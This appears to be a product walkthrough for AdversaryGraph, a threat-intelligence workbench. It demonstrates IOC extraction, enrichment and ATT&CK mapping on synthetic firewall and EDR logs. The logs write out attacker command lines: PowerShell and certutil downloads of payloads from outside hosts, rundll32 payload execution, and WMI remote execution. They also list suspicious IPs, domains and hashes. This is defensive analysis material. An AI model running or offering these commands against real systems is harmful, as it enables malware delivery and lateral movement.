About AdversaryGraph
AdversaryGraph is a self-hosted AI-assisted CTI-to-detection workbench. It connects raw evidence, threat intelligence, ATT&CK mapping, IOC enrichment, actor context, relationship graph pivots, and report generation into one local workflow.
The core path is simple: raw evidence -> IOC extraction -> enrichment -> relationship graph -> ATT&CK mapping -> report.
The Investigation Goal
The analyst starts with two noisy inputs: firewall logs showing repeated outbound traffic and EDR logs showing suspicious PowerShell, discovery commands, unsigned payload staging, and remote execution leads.
- Extract useful observables from raw logs.
- Identify suspicious behavior and likely ATT&CK techniques.
- Send extracted IOCs into IOC Investigation.
- Enrich the IOCs through local DB, OpenCTI, OTX, VirusTotal, urlscan, ThreatFox, and other configured sources.
- Review relationships, evidence ranking, source conflicts, actor leads, and TTP leads.
- Generate a structured report with the AI assistant.
Synthetic Firewall Logs
The firewall sample simulates repeated outbound connections from one workstation to suspicious IPs and domains.
2026-06-20T08:14:11Z FW01 ALLOW src=10.44.18.23 src_host=FIN-WS-042 dst=103.119.47.104 dst_port=443 sni=power-sync-services.com
2026-06-20T08:17:44Z FW01 ALLOW src=10.44.18.23 src_host=FIN-WS-042 dst=38.60.245.37 dst_port=443 sni=gatewayrvcenter.com
2026-06-20T08:24:31Z FW01 ALLOW src=10.44.18.23 src_host=FIN-WS-042 dst=38.60.245.37 dst_port=80 url=http://metakit.fireant.vn/Software/version.xml
2026-06-20T08:24:35Z FW01 ALLOW src=10.44.18.23 src_host=FIN-WS-042 dst=38.60.245.37 dst_port=80 url=http://metakit.fireant.vn/Software/setup.exe
2026-06-20T08:31:42Z FW01 ALLOW src=10.44.18.23 src_host=FIN-WS-042 dst=38.60.245.37 dst_port=443 sni=m.flach.cn note=opencti-indicator-alias-reddeltaThe pattern matters more than one line: repeated outbound communication, HTTP retrieval of `version.xml` and `setup.exe`, and CTI-linked infrastructure.
Synthetic EDR Logs
2026-06-20T08:24:38Z EDR process_start parent=WINWORD.EXE process=powershell.exe cmd="Invoke-WebRequest -Uri http://metakit.fireant.vn/Software/setup.exe -OutFile C:\ProgramData\Microsoft\setup.exe"
2026-06-20T08:24:51Z EDR file_create path=C:\ProgramData\Microsoft\setup.exe sha256=eb52d1791fc861e459ee14f15ef8d4819a4afde3ac7ce5e8cebdcd5f7840925f signer=unsigned
2026-06-20T08:25:31Z EDR process_start parent=setup.exe process=cmd.exe cmd="cmd.exe /c whoami /all && hostname && ipconfig /all"
2026-06-20T08:26:12Z EDR process_start parent=setup.exe process=nltest.exe cmd="nltest.exe /dclist:corp.local"
2026-06-20T08:27:20Z EDR process_start parent=setup.exe process=rundll32.exe cmd="rundll32.exe C:\ProgramData\Microsoft\msupdate.dat,StartW"
2026-06-20T08:32:03Z EDR process_start parent=rundll32.exe process=wmic.exe cmd="wmic.exe /node:FIN-FS-01 process call create \"cmd.exe /c whoami\""
2026-06-20T08:36:12Z EDR process_start parent=rundll32.exe process=certutil.exe cmd="certutil.exe -urlcache -split -f http://gatewayrvcenter.com/payload.dat C:\ProgramData\Microsoft\cache.bin"Step 1: Paste Logs Into AI Log Analysis
In AI Analysis, paste the firewall and EDR logs and ask AdversaryGraph to extract IOCs, suspicious commands, suspicious processes, possible ATT&CK techniques, kill-chain context, and actor or malware leads. The prompt should explicitly say not to claim attribution and to show evidence for every finding.
Step 2: Extract IOCs And Suspicious Activity
| Type | Examples |
|---|---|
| IPs | 103.119.47.104, 38.60.245.37, 166.88.77.186 |
| Domains | power-sync-services.com, gatewayrvcenter.com, metakit.fireant.vn, m.flach.cn |
| URLs | http://metakit.fireant.vn/Software/setup.exe, http://power-sync-services.com/update/check |
| Hashes | eb52d1791fc861e459ee14f15ef8d4819a4afde3ac7ce5e8cebdcd5f7840925f, fd2c2f1bf90592604febf404e5579f89 |
| Technique lead | Why |
|---|---|
| T1059 / T1059.001 | PowerShell and command execution. |
| T1105 | Download of `setup.exe` and `payload.dat`. |
| T1071.001 | HTTP/HTTPS C2-like traffic. |
| T1218.011 | `rundll32.exe` executing a suspicious payload. |
| T1047 | WMI remote execution lead. |
| T1036 | Masqueraded file names and Microsoft-looking staging path. |
Step 3: Investigate Extracted IOCs
Open IOC Investigation, submit the strongest IOC, and run Tier 1 / Tier 2 / Tier 3 enrichment. AdversaryGraph queries enabled sources, including local DB, OpenCTI, OTX, VirusTotal, urlscan, ThreatFox, Malpedia, GreyNoise Community, AbuseIPDB, Shodan, and Censys when configured.
Step 4: Review The Relationship Graph
The relationship graph is the analyst pivot map. Nodes can represent the root IOC, related domains, IPs, actor leads, malware labels, tags, source references, and TTP leads. Each node can be opened or reinvestigated, and focused graph mode hides noisy context until needed.
Step 5: Generate The Report
After evidence review, send the investigation context to the report workflow. A strong output includes the IOC type, suspiciousness rationale, source evidence, TTP leads, actor-lead caveats, kill-chain interpretation, recommended pivots, and defensive actions.
Why This Workflow Matters
Most platforms can list alerts. The value here is the workflow: extract evidence, enrich it, preserve the uncertainty, connect it to ATT&CK, and create a report that another analyst can audit.
AdversaryGraph is not an attribution engine. It is a workbench for producing better CTI and detection handoff faster while keeping source context visible.